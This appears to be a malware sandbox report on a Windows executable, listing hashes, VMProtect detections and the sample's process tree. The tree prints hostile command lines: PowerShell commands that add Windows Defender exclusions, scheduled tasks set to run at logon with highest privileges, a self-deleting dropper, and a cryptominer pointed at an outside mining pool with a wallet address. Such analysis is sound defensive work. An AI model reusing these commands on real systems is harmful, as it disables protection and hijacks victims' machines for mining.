Analysis
-
max time kernel
1s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
22/12/2023, 13:51
Static task
static1
Behavioral task
behavioral1
Sample
af9721f9690603beffdb08ccb2b8196a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
af9721f9690603beffdb08ccb2b8196a.exe
Resource
win10v2004-20231215-en
General
-
Target
af9721f9690603beffdb08ccb2b8196a.exe
-
Size
12.9MB
-
MD5
af9721f9690603beffdb08ccb2b8196a
-
SHA1
f2531c0a5d3b3670c369c1b56c3d48ce9983cb46
-
SHA256
05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
-
SHA512
8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8
-
SSDEEP
393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL
Malware Config
Signatures
-
resource yara_rule behavioral2/memory/3816-86-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/3816-85-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/3064-128-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/3816-146-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/896-151-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/896-155-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/3064-166-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/2392-248-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/2392-252-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/5072-258-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/5072-262-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/3124-266-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/2172-274-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral2/memory/4628-282-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1392 schtasks.exe 2536 schtasks.exe -
Runs net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"1⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"2⤵PID:3768
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Winteste.bat" "3⤵PID:2248
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /XML C:\Windows\winserver.xml /tn winserver4⤵
- Creates scheduled task(s)
PID:1392
-
-
C:\Windows\SysWOW64\net.exeNET FILE4⤵PID:2472
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"3⤵PID:3476
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\WNDR.bat" "4⤵PID:4348
-
-
-
C:\Windows\WindowsNote.exe"C:\Windows\WindowsNote.exe"3⤵PID:3100
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 FILE1⤵PID:2772
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 01⤵PID:3816
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 02⤵PID:3064
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 12⤵PID:896
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 22⤵PID:2392
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 32⤵PID:5072
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 42⤵PID:3124
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 52⤵PID:2172
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 62⤵PID:4628
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 72⤵PID:4688
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 82⤵PID:3408
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 92⤵PID:3920
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 102⤵PID:1852
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 112⤵PID:2560
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.TSBKFJQM --enable-igpu -lhr 0 -RUN -reboot-times 122⤵PID:376
-
-
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"1⤵PID:2732
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵PID:1796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵PID:1720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"2⤵PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:2556
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'1⤵
- Creates scheduled task(s)
PID:2536
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit1⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"1⤵PID:2320
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:4520
-
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"2⤵PID:1076
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:1036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'1⤵PID:4028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:3028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'1⤵PID:2896
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:4284
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
887KB
MD566c26c027e47f7a9fe48fff9eb4b67c9
SHA11dd6d7c9090d48021bc101c758f7845452273ce8
SHA2564366010a70d68b7327f69389b7739b0f82015d2412ae79637d1e386e27ca066a
SHA512416d121363ad9162cb69349832b5d896ef751c19c74d39bb1cebf8d99323f72fe4c7db9a145746bb5b37a0cf6aa26edb9be8b5878d3e065c35dd01f2096d2b12
-
Filesize
92KB
MD5cff0d76dd193f340ea381cde76627072
SHA19e5e58a3877f9cf3e441b3104e2cb7b8e8f2e1dd
SHA256a481487cf572da8b2cd08bb8686e359a5ba1177730cae5d19e5f95db5fcb79c0
SHA512dc826b904bc251dcd1319d1a923b942812ab863e10fe7337fdc4fa6d5b5eb8ca5f66c512460883578562bf647d8d89505c71fcf8156cc2d64f0246a1294a76ad
-
Filesize
386KB
MD5e0cff336d52bb06820e03c5542097518
SHA191194679e106c55225c436be8bf3d9bfb7aff42a
SHA25601f07014eb271777d582ed989ab32058194340c3e24f7d7884b2eecf54bca36d
SHA512cfd54560ea82a440d7627fd344835d24594b36c55da3ca70493d60c1b7a697fa4ab60a9ddf0271ce756696a4b541dfead8a108f30581d44393c18048280ce9a0
-
Filesize
1KB
MD5f88ec3f41e6a0bec16c8233002d9cedd
SHA1cc481e1ada898780077d3b048cad545f43624b92
SHA256310ff49f6a041d5a1fb93460afc21ef1cd7ee80675053953566072422f10367e
SHA5129abb41ce50001957c0e5339a3aa703255ce13235e304eb355d320001674b2850c4f8f09c3721d5f7a077b2e12bcc23c588fa88248704987eada6eea633179bad